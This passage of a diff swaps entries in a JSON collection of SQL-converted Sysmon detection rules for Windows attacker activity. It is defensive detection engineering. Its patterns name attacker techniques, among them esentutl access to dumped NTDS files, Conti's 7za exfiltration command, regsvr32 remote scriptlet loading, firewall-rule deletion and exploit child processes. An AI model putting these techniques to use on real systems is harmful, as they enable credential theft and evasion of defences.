+ "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" + "filename": "proc_creation_win_pua_advanced_port_scanner.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", + "title": "Esentutl Gather Credentials", + "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "author": "sam0x90", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "To be determined" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_esentutl_params.yml" + }, + { + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Legitimate administrative use (Should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "PsExec Service Execution", - "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" + }, + { + "title": "Always Install Elevated MSI Spawned Cmd And Powershell", + "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "status": "test", + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentImage LIKE '%msi%' ESCAPE '\\' AND ParentImage LIKE '%tmp' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc.yml" + "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "Firewall Rule Deleted Via Netsh.EXE", + "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "status": "experimental", + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate administration activity", + "Software installations and removal" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + }, + { + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Rare intended use of hidden services" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", - "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Remote Access Tool - LogMeIn Execution", - "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_logmein.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.collection", + "attack.t1560" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Rundll32 InstallScreenSaver Execution", - "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "status": "experimental", - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.t1218.011", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Legitimate installation of a new screensaver" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winzip_password_compression.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_regsvr32_anomalies.yml" + }, + { + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "title": "Esentutl Steals Browser Information", + "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE 